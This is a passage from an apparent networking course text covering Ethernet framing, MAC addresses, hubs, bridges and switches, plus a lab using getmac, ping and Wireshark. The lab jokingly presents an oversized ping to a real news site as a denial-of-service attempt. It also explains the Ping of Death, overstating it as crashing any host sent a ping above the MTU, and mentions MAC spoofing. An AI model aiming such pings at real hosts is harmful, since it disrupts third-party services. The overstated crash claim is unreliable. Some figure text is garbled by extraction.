to appreciate. We limit the maximum frame to 1518 bytes for three reasons: To prevent a single user from hogging the network. Recall the picture on page 271 that shows four users sending their data over the same wire. Suppose you are one of those users, and you want to send a frame. With Ethernet, a user who wants to transmit a frame first listens on the wire to make sure no one else is already transmitting. If someone else is already transmitting, then it would make no sense for you to transmit at the same time: You would garble the transmission in progress, and your transmission would also garble. So, you patiently wait for the wire to go idle before you transmit. Since Ethernet users always politely wait for the shared wire to go idle before transmitting, a greedy user who starts transmitting could keep transmitting forever, never allowing others an opportunity to transmit their frames. To avoid this, a user is allowed to transmit at most 1518 bytes before they must stop and give other users an opportunity to transmit their frames. Error control. With Ethernet, if a single bit arrives in error, the entire frame is thrown away by the receiver. Since each bit represents an opportunity for error, the fewer bits we have, the fewer opportunities for error we have. Historical reasons. Data that arrives at the NIC must be buffered before it is sent to main memory. Although memory is very cheap today, memory was very expensive in the 1970s and 1980s when the Ethernet standard was developed. The minimum Ethernet frame size—64 bytes—is based on technical considerations that are far less intuitive. We mentioned that when a host using Ethernet wants to transmit a frame, it first listens to see if anyone else is transmitting. Only if a host senses that the medium is "quiet" does it proceed with the transmission of its frame. But even if a host takes care to ensure that the medium is quiet, collisions can still occur! For example, suppose two hosts want to transmit an Ethernet frame at the same time and both first listen to ensure the medium is not in use. Both stations will detect that the medium is not in use and both will start transmitting! These sorts of collisions are unavoidable. Since collisions are unavoidable, we want to ensure that a user can tell if his transmission was involved in a collision. When Ethernet users start transmitting, they continue to listen to the channel to detect a collision. It is important for a user to know if his frame was involved in a collision since any frames involved in collisions will need to be retransmitted. Thus, we need to ensure that User-1 is still transmitting under the condition that the furthest away station (say, User-2) listens to the channel just before User-1's frame arrives, senses it idle and starts transmitting also. Based on the maximum allowed separation between users and the speed of light (more precisely: the speed of propagation in the cable), it can be shown (we skip the derivation) that if the minimum frame size is set to 64 bytes (512 bits) a user will be able to tell if it was his frame that was involved in a collision. An Aside Ethernet users share access to the channel. For that reason, Ethernet is termed a Multiple Access (MA) scheme. In addition, Ethernet users listen to (i.e., sense) the channel before transmitting. This way they do not start transmitting their frame while another frame transmission from some other user is already in progress. For that reason, Ethernet is termed a Channel Sense Multiple Access (CSMA) scheme. 21 Finally, even after an Ethernet user starts transmitting, she continues to sense the channel for collisions. Collisions can occur if two users sense the channel idle at the same time and start transmitting. When a host detects that her frame is colliding, she immediately stops transmitting (what's the point of continuing to transmit a frame if we already know it's garbled?). For this reason, Ethernet is termed a Channel Sense Multiple Access with Collision Detection (CSMA/CD) scheme. 3. Ethernet's Solution to the Address Problem 21 Since a signal in this context is carrying our data, it is referred to as a carrier signal, when we sense the channel we are sensing to detect the presence or absence of the carrier signal. Thus, CSMA is most often called Carrier Sense Multiple Access. 273 Each Network Interface Card (NIC) is assigned a globally unique address—an Ethernet address—that is burned into the card's Read Only Memory (ROM). ROM is non-volatile memory whose contents cannot be altered by the user. All machines on an Ethernet LAN are guaranteed to have unique addresses. Moreover, no two hosts anywhere in the world have the same Ethernet address. So, when you buy a NIC (or, as is most often the case, a computer that contains a NIC), you are also buying a globally unique Ethernet address that only you possess. Ethernet Addresses are 6 bytes. It is important to realize that Ethernet addresses are also commonly referred to as physical addresses, hardware addresses and Medium Access Control (MAC) addresses—these terms are all synonyms! Practice Problem 12.4 (a) How many bits are in an Ethernet address? (b) How many hexadecimal digits are needed to express an Ethernet address? Solution: (a) (b) Ethernet addresses are usually expressed in hexadecimal notation (sometimes with colons between the bytes). For example, an Ethernet address might be 06:01:03:02:2A:3D. Practice Problem 12.5 Two of these 48 bits in an Ethernet address are used for special purposes. Disregarding these two bits, how many possible Ethernet addresses exist? Solution: Practice Problem 12.6 If there are 7 billion people in the world, and we disperse Ethernet addresses uniformly, how many addresses are available for each person? Solution: You should be convinced that we are in no danger of "running out" of Ethernet addresses! The uniqueness of Ethernet addresses is assured by the fact that the first 3 bytes of the address are assigned to a given manufacturer (or vendor), and this vendor must use these three bytes as the first three bytes in every NIC that the vendor manufactures. (The Institute of Electrical and Electronics Engineers—IEEE—is the group that actually does this assignment). For instance, all NICs manufactured by 3COM have Ethernet addresses starting with 02608C, all NICs manufactured by Cisco have Ethernet addresses starting with 00000C, etc. Practice Problem 12.7 How many possible Ethernet addresses exist for each individual vendor? Solution: Sometimes, a host may want to transmit a frame to every other user on the Ethernet LAN. A special address is reserved for this purpose. A host may send a frame to everyone by sending the frame to the broadcast address, which is the address consisting of all ones; i.e., a string of 48 consecutive 1’s. Practice Problem 12.8 Express the Ethernet broadcast address in hexadecimal. Solution: 274 Referring back to the Ethernet picture on page 271, any frame transmitted by any user arrives at the NIC of all other directly connected users! Stated another way, the NIC receives all frames that are sent on the wire. But it only forwards some of the frames up to the host's network layer. Specifically, the NIC only forwards to the network layer: Frames addressed to its own unique address. When a frame arrives at the NIC, the NIC checks the frame to see the destination address. If the destination address of the frame matches its NIC address, then the NIC “realizes” that this data is intended for itself, and passes the frame to the network layer. If the destination address in the frame does not match its NIC address, the frame is discarded. Frames addressed to the broadcast As mentioned, a frame sent to the broadcast address (48 ones) will be accepted by every NIC. All frames if the NIC is placed in "promiscuous" mode. A vulnerability of Ethernet is the ease with which an Ethernet card can be programmed to accept all frames, even frames addressed to other users. So, any user who sets their NIC to promiscuous mode can examine the traffic sent by all other users. 4. Ethernet's Solution to the Error Control Problem Recall from the picture of the Ethernet frame shown on page 272 that the last four bytes are used for the Cyclic Redundancy Code (CRC). The CRC is used for error detection. Ethernet can only detect errors; it cannot correct errors. If a frame arrives with errors, it is simply discarded. (Higher-layer protocols may later recognize the loss of data and take action to remedy the problem, such as by requesting retransmission. Ethernet, though, simply discards frames containing errors without giving the matter a second thought.) An Aside Ethernet's CRC algorithm hinges on a special number that mathematicians have devised. This number, given the name CRC-32, is special because it almost never divides evenly into other numbers, i.e., it almost always leaves a remainder when it is divided into another number. When the NIC crafts a frame to transmit, it fills the four byte CRC field with the specific bits that will make the total frame (including the CRC field) perfectly divisible (with no remainder) by CRC-32. When this frame is received by the destination, the destination NIC divides the received frame by CRC-32. If the frame arrives without errors, the result of the division will be zero and the frame will be accepted. If any bits were flipped en-route from source to destination the resulting division will leave a remainder and the frame will be discarded. 5. Ethernet's Solution to the Multiple Access Problem We have already outlined the mechanism by which Ethernet users share a channel. They listen first before transmitting (so as not to collide with the transmissions of other users). Suppose we have 4 users on a 10 Mbps Ethernet. The 4 users share the 10 Mbps capacity of the network. If all 4 users have a lot to say, then each user will, on average, get to use the network ¼ of the time. As a rough approximation, we can say that each of the 4 users will get to send at 2.5 Mbps. From each user’s perspective, they are on a 2.5 Mbps network, not a 10 Mbps network. Make sure you are clear on why things work this way: In Ethernet, users might share a medium, and any user’s transmission will prevent all others on that same shared medium from transmitting. When one of the four users in our scenario above transmit, the other three users will be prevented from transmitting because they will first sense the channel and will not intentionally collide with another user. We say that the four users in this example share a “collision domain.” If users have the ability to collide with each other, they are in the same collision domain. As a back-of-the-envelope calculation, we can say that the bandwidth 22 available to a user is given by: BW per user = Total BW available in the collision domain Number of users sharing the collision domain 22 In networking, the term bandwidth has two meanings. One meaning of bandwidth is data rate, measured in bits per second. That is the meaning which we use in this chapter. Later in this course (in the Wireless Module) we will encounter the other meaning of the term bandwidth. 275 Figure 13.15 A network with and without a bridge Practice Problem 12.9 What is the bandwidth available to each of the users on the 10 Mbps Ethernet shown below? Solution: Practice Problem 12.10 What is the bandwidth available to each of the users on the 10 Mbps Ethernet shown below? 13.25 Solution: II. Connecting Users on an Ethernet LAN 1. Hubs Ethernet first used a bus topology with heavy garden-hose size coaxial cable. In a bus topology, all users are connected in a straight-line configuration, as in the example on the prior page. Later, the communication medium transitioned to unshielded twisted pair (UTP), which wasAnubiquitous inconnecting most office Figure 1.10 isolated LAN 12 buildings. computers to Most a hub buildings in a closet were set up such that UTP wires terminated in a central electrical cabinet that served as a hub. Here, the term hub was simply meant as a “center of activity,” the way the term is still used as in “Denver is a hub for United Airlines.” The picture below illustrates this idea. Electrical closet Windows Stray cup of coffee From, Forouzan, Data Communications and Networking, McGraw Hill, 2007 1.13 Now, devices called Ethernet hubs are used to connect the twisted pairs from each host together. 276 Ethernet Hub Using the hub pictured above, we can connect four hosts together simply by plugging each host's NIC into one of the hub's four ports. When using a hub, we can consider the hosts to be, for practical purposes, electrically soldered together at the hub. Frames that arrive at one port are sent out on all other ports. A frame arriving on one port is not buffered or stored—it is simply transmitted out on all of the other ports. Fault isolation is easy with hubs—we merely have to unplug the problem host. Adding and removing hosts is also easy—we just plug in new users and unplug hosts that we want to remove from the LAN. It is important to note that a hub is a physical layer device. It only recognizes the existence of bits. When bits arrive on one port, they are sent out on all of the remaining ports. A hub does not understand that some bits that arrive are Ethernet addresses and some bits that arrive are CRC, and so forth. To a hub, everything is just bits. Practice Problem 12.11 Consider the 10 Mbps Ethernet shared by the busy users in the network below. The network uses three 4-port hubs. How much bandwidth is available to each user? Figure 13.15 A network with and without a bridge Solution: 2. Separating Collision Domains with Bridges A bridge is similar to a hub in that it can be used to connect multiple hosts or multiple LANs. The distinction is that a bridge will only transmit what has to be sent to the other LAN, whereas the hub will send all information. To make this distinction clear, consider the picture below, which shows two Ethernet LANs joined together by a bridge. 1 2 3 4 5 6 9 10 11 12 13 14 Suppose Host 3 wants to send a frame to Host 5. Host 1 sends the frame out on the left LAN and it arrives at all users on that LAN, including the bridge. The bridge will inspect the frame, and see that it is destined for Host 5. The bridge knows that Host 5 is on the left LAN and must have already received the frame (since everyone on the left LAN received the frame). The important point: the bridge will not forward the frame to the right-side LAN since the bridge knows that Host 5 is not on the right-side LAN. A bridge can be used to connect two or more Ethernet LANs like a hub, but—unlike a hub—a bridge can divide up the hosts into separate collision domains. When a frame arrives, the bridge looks at the source and destination Ethernet addresses. The bridge then decides whether the frame should be forwarded (and if so, to which outgoing port). Since a bridge looks at and 13.25 277 understands data link addresses, it operates at the data link layer (Layer 2). A bridge is said to be a “Layer- 2 connecting device.” Figure 13.15 The main advantage of bridges over hubs iswith improved performance. may want to split a single heavily loaded LAN into A network and withoutWe a bridge separate LANs to improve performance by limiting collisions and forwarding only when we have to. Bridges have a few ancillary advantages. Bridges enhance reliability, since a single bad user (outputting continuously) will not disable all hosts; Hub a bridge A network and Additionally, without if bridges are used, the bad user will only killwith his segment. bridges can be used to enhance security, since we can isolate portions of the network and only forward frames where they must go. Figure 13.15 Practice Problem 12.12 Consider users employing 10 Mbps Ethernet. How much bandwidth does each user get in each of the three scenarios below. (a) Scenario 1: (b) Scenario 2: (c) Scenario 3: 13.25 13.25 Solution: (a) (b) (c) 278 We should note that the results of the preceding calculations are, at best, approximations. We are presuming that a bridge port provides as much traffic on a LAN as a typical user. For example, in the picture above, consider the top-left collision domain. This collision domain has three users, plus the bridge port. The bridge port, however, is conveying the traffic from nine other users (the users on the other three LANs), so it may not be the case that the bridge port contributes the same amount of traffic in this collision domain as the other three users. Nevertheless, since bridges are often used to separate users who do not communicate very often, assuming a bridge port acts as a typical user often yields satisfactory results. 3. Switched Ethernet Look at Scenario 3 above, which shows 12 users on a 4-port bridge. In this case the 12 users are divided into four collision domains, with three users (and a bridge port) within each collision domain. What would happen if we had the 12 users on a 12-port bridge? In this case each user would be in his own collision domain (sharing it only with the bridge). An N-port bridge that serves a number of hosts N is referred to as a “Layer-2 switch" or an "L-2 switch”. Consider the scenario depicted below, which shows 7 users connected to a 9-port bridge. From here on out, whenever the number of users is less than or equal to the number of ports (as is the case here), we will use the term Layer-2 switch, or simply switch, instead of the term bridge. Do collisions still occur? The answer is Yes, but only between a user and the switch. In the scenario above, all hosts can successfully transmit at the same time since each port is now a separate collision domain. Note that L-2 switches, like bridges, look at frame addresses, and operate at the data link layer. While many people use the two terms interchangeably, a switch is most often used to connect individual computers, whereas bridges usually connect LANs. Thus, in this taxonomy, with L-2 switches each computer is in its own collision domain, whereas with bridges each connected LAN forms a collision domain. Practice Problem 12.13 You have set up an Ethernet LAN for 10 users. For simplicity, assume the network has an efficiency of 100% and that resources are shared equally among users. How much bandwidth is available to each user if: (a) The 10 users are connected on a 10 Mbps Ethernet to a hub. (b) The 10 users are connected on a 10 Mbps switched Ethernet Solution: (a) (b) Practice Problem 12.14 You want to set up an Ethernet LAN for a group of 10 offices at the Pentagon. Each office requires 2 digital telephone lines (64 kbps each). Additionally, each office must support a peak web browsing demand of 40,000 bytes/min. (a) What is the total bit rate demand of the LAN? (b) Would a standard 10 Mbps Ethernet suffice? Solution: (a) (b) 279 Practice Problem 12.15 Match the column on the left with the description on the right: Network Interface Card (a) Looks at MAC address and then forwards the frame on the correct port Hub (b) Copies incoming bits to all other ports Switch (c) Piece of equipment with a unique address that translates bits to signals and transmits the signals on the medium. Practice Problem 12.16 If an entire IP packet has 8096 bytes, how many Ethernet frames are required to transmit this packet? Solution: Practice Problem 12.17 Answer True or False to the following statements: (a) An Ethernet address is normally expressed in decimal. (b) An Ethernet address is burned into hardware and never changes (c) An Ethernet address is used at the network layer to address packets. (d) An Ethernet address, MAC address, and Hardware address are all the same thing. (e) When I log on to different networks my Ethernet Address can change every time. An Aside Fast Ethernet (1995) Fast Ethernet uses the same frame format as “standard Ethernet”, i.e., it still uses 48-bit data link addresses and uses the same frame fields as shown on page 314 of these notes. Fast Ethernet is backward-compatible with standard Ethernet. And, perhaps surprisingly, it uses the same minimum and maximum frame lengths as standard Ethernet. Also, it has the same maximum physical length as standard Ethernet (100 meters for UTP). There is a big difference: Fast Ethernet operates at 100 Mbps. So…how do we raise the data rate? The details are rather technical, and have to do with the improvements in technology over the years. The original Ethernet operates at 10 Mbps, but required a special type of signaling called Manchester encoding. Advances in transmission media allowed for a signaling scheme that supported higher data rates. Better clock circuitry allowed us to raise the transmission speed without worrying about loss of synchronization. Instead of using one twisted pair, we use four twisted pairs: 1 to the switch, 1 from the switch, and 2 that are switchable to support the current direction of traffic flow. TWISTED PAIR 1:Always to the network TWISTED PAIR 2:Always from the network TWISTED PAIR 3 and TWISTED PAIR 4 Can be switched from one direction to the other, to support the current desired direction of traffic flow Finally, 3-level signaling is used at the physical layer. Instead of sending a 0 or 1, we can send 0, -1 or +1. 280 Problems 1. What are the advantages of dividing an Ethernet LAN with a bridge? 2. What is the relationship between a switch and a bridge? 3. Suppose the Ethernet data link layer receives 42 bytes of data from the network layer. How many bytes of padding must be added to the data? 4. What is the ratio of useful data to the entire packet for the smallest Ethernet frame? 5. Suppose we have a standard 10 Mbps Ethernet LAN, on which the average frame size is 1000 bytes. If a noise burst of 2 msec occurs on the LAN, how many frames are destroyed? 6. Sketch the Ethernet packet required to send the text string “Hello World” from Alice (whose MAC address is 11:22:33:44:55:66) to Bob (whose MAC address is AA:BB:CC:DD:EE:FF). Your error correction bits are 0101 1100 1010 1010 1111 1110 1011 1101. Assume that any padding bytes consist of all-zeroes, and that the Length/Type field is used as a Length field. You do not need to show the bytes added by the physical layer. RECALL: ALL VALUES ARE REPRESENTED IN HEXADECIMAL! 7. Consider the network below, which shows four 10 Mbps LANs connected by two bridges, labeled B1 and B2. Assume all users (labeled 1 through 7) are very chatty and equally chatty. 6 7 LAN 4 1 2 3 4 B1 LAN 1 (a) (b) (c) (d) 5 B2 LAN 2 LAN 3 What is the effective data rate seen by user 4? What is the effective data rate seen by user 5? What is the effective data rate seen by user 6? What is the effective data rate seen by user 6 if the two bridges are replaced with hubs? 281 8. Two standard (10 Mbps) Ethernet topologies are illustrated in Figure 1 and Figure 2 for a network consisting of six computers. Figure 1 Figure 2 (a) How much bandwidth does each user get for the network topology depicted in Figure 1? (b) How much bandwidth does each user get for the network topology depicted in Figure 2? (c) How much bandwidth would each user get if a switch was used to connect together the six computers in my network? 282 Security Exercise 12 Part 1. Your Ethernet Address A computer is connected to a network by a Network Interface Card (NIC), also termed a network adapter. That is, the NIC is the physical interface between a computer and the networking medium. The networking medium, in turn, might be a wire, a fiber optic strand, or free space (in the case of wireless networks). Each NIC is assigned a globally unique address burned into the card's Read Only Memory. All machines on an Ethernet LAN are guaranteed to have unique addresses. No two Ethernet users anywhere in the world can have the same global address. Addresses are 6 bytes, of which 46 bits are used for the unique address. The NIC interfaces with the physical media, so this globally-unique address is often called the physical address. Since physical devices are often termed hardware, a NIC’s unique address is also frequently referred to as a hardware address. Finally, since the NIC controls access between the computer and the networking media, its address is also termed a Media Access Control (MAC) address. Since most NICs conform to the Ethernet standard, the NIC address is also called an Ethernet address. Thus, the NIC address goes by four different names which are often used interchangeably: Physical Address Hardware Address MAC Address Ethernet address In Windows, open a command prompt. (To open a command click the Start button and in the search box type cmd and press Enter). At the command prompt, type: getmac /v Question 1. Ignoring VMware virtual adapters, and Wi-Fi, what is your computers' Ethernet address? Recall that a MAC address is 48-bits. The first 3 bytes provide the address of the NIC manufacturer (or vendor). The Institute of Electrical and Electronics Engineers (IEEE) assigns blocks of addresses to various manufacturers. For a listing of vendor codes, see http://standards.ieee.org/develop/regauth/oui/oui.txt Question 2. What vendor manufactured your Ethernet card? Question 3. Ward Hall has a policy that midshipmen can only connect their original issued computers to the USNA network. Suppose you go to Best Buy, but a new computer and connect it to the network. Will Ward Hall be able to tell? If so, how? Can you "spoof" your MAC address—i.e., have your computer tell the rest of the world your MAC address is different from the actual value burned into ROM? The answer is: Yes, it is very easy to spoof your MAC address—it requires a change to one line of the easy-to-edit Windows registry. However, you should not do this since even a small screw-up while editing the Windows registry can irreparably damage your computer. Bottom line, unless you are a CS major with a 4.0 QPR and ten computers (so you have a few to spare), you should never edit the Windows registry. But, can't I download freeware (for example, Technitium) or buy inexpensive products (like SMAC) that will correctly do this registry change for me? And, oh, by the way: Who am I? You can do this, but the ITSD User Agreement that you have signed in blood forbids it. So, if you download this software you will be fried. Don't do it! That wouldn't have stopped me! Don't listen to him midshipman! Times have changed since 1958! You will be fried! DON'T DO IT!!! Chicken! 283 Part 2. Using ping to Determine the Largest Possible Ethernet Frame Size ping is a tool that can be used to determine whether our computer can reach another computer across the Internet. From the Windows command prompt, type ping www.cnn.com You should see something similar to: C:> ping www.espn.com Pinging www.espn.com [199.181.132.250] with 32 Reply from 199.181.132.250: bytes=32 time=74ms Reply from 199.181.132.250: bytes=32 time=84ms Reply from 199.181.132.250: bytes=32 time=76ms Reply from 199.181.132.250: bytes=32 time=75ms bytes of data: TTL=233 TTL=233 TTL=233 TTL=233 Ping statistics for 199.181.132.250: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 74ms, Maximum = 84ms, Average = 77ms ping is a probing tool that sends a packet from our computer to the designated target computer (in this case, the computer with the name www.espn.com) and waits for a reply. The output above tells us several things: our ping packet contains 32 bytes of data (it also happens to contain another 28 bytes of header information). we conducted a total of 4 probes. we received replies to all four of our probes. the round trip time for our four probes were 74, 84, 76 and 75 milliseconds. Looking at the ping reply above, notice that www.espn.com is also referred to as “199.181.132.250.” This latter sequence of four numbers (separated by decimals) is, as you might already know, the computer’s IP address. Thus, the computer named www.espn.com has IP address 199.181.132.250. We will discuss IP addresses in the next lecture. When we use the ping command, we, by default, ping the target host with 32 bytes of data. We can change the size of the ping packet by using the –l option. For example, if I type ping -l 100 www.cnn.com I will see something along these lines (but note that IP addresses can and do vary over time): Pinging www.espn.com [199.181.132.250] with 100 Reply from 199.181.132.250: bytes=100 time=75ms Reply from 199.181.132.250: bytes=100 time=75ms Reply from 199.181.132.250: bytes=100 time=74ms Reply from 199.181.132.250: bytes=100 time=74ms bytes of data: TTL=233 TTL=233 TTL=233 TTL=233 Ping statistics for 199.181.132.250: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 74ms, Maximum = 75ms, Average = 74ms Notice that I pinged www.espn.com with 100 bytes of data. If I had typed ping -l 150 www. cnn.com I would have pinged with 150 bytes of data. Hmmm... I wonder what would happen if I tried to ping www.espn.com with a very large packet. This would mean that the computer would have to stop for a long time and deal with my request. So, the services of www.espn.com would be then be denied to others. I might just call this an attack...hmmm...a denial of service attack ...yea, that’s the ticket. I try to ping with a 50,000 bytes by typing: ping -l 50000 www.cnn.com and I see: Pinging www.espn.com [199.181.132.250] with 50000 bytes of data: Request timed out. Request timed out. 284 Request timed out. Request timed out. Ping statistics for 199.181.132.250: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), Gasp! My plans for world domination are foiled! The target rejected my ping packets! Why? Well, Ethernet, which is the local area network technology used by just about everyone (including us!) will only allow the data packet to be at most a certain size. This maximum size is called the Maximum Transfer Unit (MTU). Well…what if we want to send a block of data bigger than Ethernet’s MTU? In general, there is no problem with this; the large block of data is broken (i.e., fragmented) into pieces (each of which is less than or equal to Ethernet’s MTU), and these pieces are then sent individually. The pieces (fragments) are then put back together when they all arrive at the destination. In general, there is no hitch, except for one wrinkle: hosts will often ignore ping packets that were fragmented. Why, you ask? Well, in the mid 1990’s, it was discovered that if a ping packet was fragmented, it could be forced back together at the destination in such a way that the final size of the reconstituted packet was larger than the maximum permissible IP packet size, causing the host’s operating system to crash. This scenario was given the somewhat unpleasant name: The Ping of Death. The Bottom Line: You can crash someone's computer if you send them a ping that is so large that it cannot fit in one Ethernet frame, i.e., you can crash someone's computer if you send them a ping that exceeds Ethernet's MTU. Most operating systems are on to this behavior, and will not permit reception of a fragmented ping. In summary, if you send a very large ping packet, it will need to be fragmented to fit inside Ethernet’s MTU, but these fragments will then be ignored by the destination since there is no good reason someone should want to send me a ping packet that was so big that it had to be fragmented. What is Ethernet’s Maximum Transfer Unit? What is the largest block of data that Ethernet will allow me to send without requiring fragmentation? To see, we can use the –f option in the ping command. This option will mean that the packet will not be fragmented, so, if the packet is bigger than Ethernet’s MTU, it won’t be sent. For example, if I type ping -f -l 50000 www.cnn.com I am told that the packet needs to be fragmented, but the packet will not be fragmented because the 'don't fragment' option (f) has been used. Question 4. What is the Ethernet’s MTU? Note that whatever number seems to work for ping, you must add 28 to it, since the ping data has 28 bytes of header information tacked onto it. Question 5. After you have completed Question 4, review the notes where we discussed the maximum size of an Ethernet frame. Does your answer to Question 4 match what the notes say is the maximum amount of data that can fit inside the data field of an Ethernet frame? Part 3. Wireshark Spurred by the Snowden revelations, The Guardian published an article titled "The NSA is turning the Internet into a total surveillance system." Others speculate that the NSA may be monitoring essentially all Internet traffic. Concerning the NSA's surveillance of Internet traffic, security expert Brian Reid opined that "This isn’t a wiretap, it’s a country-tap.” Our objective today is not to examine why such surveillance is done, but rather to gain a sense of how such surveillance is done. Toward that end, we will gain basic familiarity with a packet sniffer named Wireshark. A packet sniffer is, in essence, a wiretap that allows you to monitor the traffic passing a particular point in a computer network. A packet sniffer not only allows you to analyze or inspect individual packets as binary or hexadecimal symbols, but also attempts, where possible, to convert binary packets into a human-readable format. Packet sniffers allow the user to determine who is communicating with whom, and what they are saying, topics of great concern to network security specialists and the people who keep them busy. Packet sniffing, as with most things, can be used for good purposes or for malicious purposes. A hacker can certainly use a packet sniffer to detect who is communicating with whom, and the nature of the communication (so-called metadata). Any unencrypted content (to include unencrypted passwords) can also be read. The NSA uses packet sniffers to thwart terrorist plots. In June 2013 General Keith Alexander, the Director of the NSA, testified that the NSA's surveillance programs had foiled at least 50 terrorist attacks worldwide. Computer engineers use packet sniffers for good purposes also: A network can be analyzed to determine if there is excessive congestion, troubleshooting of faults can be facilitated, unauthorized network users can be detected, etc. 285 A. Getting Started Wireshark is a packet sniffer that will capture packets and display them using a nice Graphical User Interface (GUI). Wireshark is a passive program; it does not transmit packets onto the network. It merely analyzes what traffic is going past your NIC. Start up VMware Workstation and power-on your Cyber2 VM. Then launch Wireshark be selecting: Applications > Internet > Wireshark (as root) Launch Wireshark. Under File, Click Open and highlight the file named packets: And then hit Open 286 Now, after opening the file you should see something much more interesting. (If your display looks slightly different from that shown on the next page, don’t worry. If it looks radically different, let the instructor know.) Packet List Pane Packet Details Pane Packet Bytes Pane This shows you all the packets that were in the file that was provided. Three pains...I mean panes...are provided. Referring to the figure above, we see the Packet List Pane: This displays a summary of each packet captured. Each line represents a packet. You can see that the packets are numbered—Number 1, Number 2, etc. (This pane presents so-called metadata. From metadata we can determine such things as: Who is initiating the communication? Who is the intended recipient? What is the overall goal of the communication—is it an attempt to access a web site? Is it an attempt to send an email? Is it a file transfer? By clicking on a packet in this pane, you control what is displayed in the two lower panes. In the figure above, the first line (Packet 1) is highlighted in green, and the two other panes give details about this packet. Packet Details Pane: Displays more details about the packet that you highlighted in the Packet List Pane. Packet Bytes Pane: Displays gory details about the packet selected in the Packet List Pane, and highlights the field selected on the Packet Details Pane. Whereas the top pane reveals the metadata, this pane reveals all of the contents. Take a moment to memorize the names of these three panes, so that when you see, for instance, “Packet Details Pane” you don’t have to think: Which one was that again? Okay, let’s look at the Packet List Pane (which one was that again?). At the top of the Packets List Pane, starting at the left, we have number (No) column. As mentioned, each packet that was captured is sequentially numbered by Wireshark. Question 6. How many packets were captured? Next over, we have the Time column. By default, this column indicates the relative time that each packet was received, with the first packet arriving at t = 0. Question 7. What is the number of the packet that was received 10 seconds into this trace? Let’s look at packet 5182. Look at the Packet Details pane for this packet: 287 This shows the protocols used by this packet. So, for instance, we see that this packet used Ethernet, The Internet Protocol (IP) and the Transmission Control Protocol (TCP). By clicking on the plus sign we can expand and collapse each of the listed protocols. The bottom pane, the Packet Byte pane, shows the data in the selected packet (in this case, packet 5182) in hexadecimal. Now, let’s look at the Ethernet protocol in more detail. Click the arrow next to Ethernet and you should see this: Question 8. Look at the first 12 hexadecimal numbers in the Packet Bytes Pane. It reads: 00 01 02 c6 3b 6a This is the very start of the Ethernet frame. Referring to the Ethernet frame format from your notes, what is the meaning of these 12 hexadecimal numbers? Question 9. Look at the next 12 hexadecimal numbers in the Packet Bytes Pane. It reads: 00 04 80 74 09 00 This is the next part of the Ethernet frame. Referring to the Ethernet frame format from your notes, what is the meaning of these 12 hexadecimal numbers? Question 10. Do your answers for Questions 8 and 9 match the info provided in the middle pane? Question 11. Can Wireshark be used to determine the NIC card numbers of people using the network? Question 12. Look at the next four hexadecimal numbers in the Packet Bytes Pane. It reads: 08 00 Referring to the Ethernet frame format from your notes, what is the meaning of these 4 hexadecimal numbers? Question 13. Go to the website: http://www.cavebear.com/archive/cavebear/Ethernet/type.html What type of information is carried in the data field of this Ethernet frame Look at packet number 2. Question 14. What destination hardware address was used in this frame? What is the meaning of that value for the destination address? 288 Security Exercise 12 Answer Sheet Name: Question 1: Question 2: Question 3: Question 4: Question 5: Question 6: Question 7: Question 8: Question 9: Question 10: Question 11: Question 12: 289 Question 13: Question 14: 290 Chapter 13: Internet Protocol Objectives: (a) Summarize the principles behind the design of the Internet Protocol. (b) Define the structure of an IP address and define the purpose of network masking. (c) Determine the address space available given an IP address and mask. (d) Identify and explain the basic fields of the IP header. (e) Understand the current use of the IP address space. I. The Problem and the Solution 1. The Problem. As computer networking took off in the 1970's, many different competing companies developed many different network architectures, each using different protocols at each layer. Each company advertised its own approach as "the best." This explosion of different approaches was beneficial in that it fostered competition, with each company vying to make their own network architecture better. But, all the while, this presented a problem when people on different networks wanted to connect to each other. Originally, computers could only talk to other computers on the same network—but, at the same time, there was a strong desire to allow any two computers on any two networks to be able to communicate. This seemed infeasible: Different networks have different frame formats at the data link layer, different physical layer characteristics, different addressing schemes, etc. Consider the internet shown below, which consists of a token ring (RIP), an Ethernet network and an IBM network (RIP) connected together. Each of these networks uses different frame formats, as shown. Could we just plop an Ethernet frame on a token ring network or an SNA network and have it work? 291 Token Frame Format Data Frame Format 1 1 1 SD AC 2 or 6 Destination Address FC Starting delimiter SD 4 2 or 6 Source Address J K 0 J K 0 ED AC Information FCS 0 1 ED 1 FS IBM(line SNA J, K non-data symbols code) 0 Ethernet Access control PPP Frame control FF T M PPP Priority; T Token bit R R R Ring M Monitor bit; RRR Reservation Token FF frame type ZZZZZZ control bit Z Z Z Z Z Z High-Level Data Link Control Ending delimiter Figure 13.4 802.3 MAC frame Frame status J K 1 J K 1 A Copyright ©2000 The McGraw Hill Companies C xx A I C I E E x x intermediate-frame bit error-detection bit A address-recognized bit xx undefined C frame-copied bit Leon-Garcia & Widjaja: Communication Networks Figure 6.61 The answer is, of course: No. The frame formats on one network will be completely unrecognizable on a different network! For example, with Ethernet, the destination address occurs starting on the 9 th byte into the frame. In tokenprotocols. ring, the destination Frame format for bit-oriented th nd address starts with the 4 byte into the frame. In SNA, the destination address occurs on the 2 byte into the frame. 13.7 As another example, in Ethernet the data starts 23 bytes into the frame, in token ring the data starts either 7 or 15 bytes into the frame, and for SNA the data starts 3 bytes into the frame. A frame from one network will look like garbage on a different network. Note that, aside from the frame format, different networks have “structural” differences also. For example, Ethernet has a maximum frame size of 1500 bytes, token ring has a maximum frame size of 5000 bytes and SNA has no maximum frame size. Consider also: Ethernet addresses are always 6 bytes. Token ring addresses can be 2 or 6 bytes, and SNA addresses are 1 byte. And, furthermore, we’ve shown only three networks connected above. Throw in an ATM network, a Token Bus network, some Novell and AppleTalk crap, an FDDI optical network and a couple of wireless LANs and things go to hell in a handbasket. To summarize, then, we need protocols that can implement internetworking, i.e., we need protocols that can overcome the differences in networks. These protocols should "conceal" the underlying network differences so that users are unaware that different networks even exist. From the user's perspective, everyone should be on one monolithic network. 2. The Solution: The Kahn/Cerf Protocols A revolutionary solution to the internetworking problem was proposed in the early 70's by Vinton Cerf and Robert Kahn. The two protocols they proposed, later christened the Internet Protocol (IP) and the Transmission Control Protocol (TCP) quickly became the most popular suite of protocols for internetworking and were subsequently adopted as the protocols used by the Internet. 292 Vinton Cerf Robert Kahn Cerf and Kahn with President Bush If the award of the Presidential Medal of Freedom does not convince you of the importance of these protocols, perhaps this will: These protocols are so damn famous that one of the authors was once invited to give a talk to fascinated midshipmen: These two protocols—IP and TCP—are truly a work of genius. These protocols were intended to allow internetworking for small networks (in 1975 the 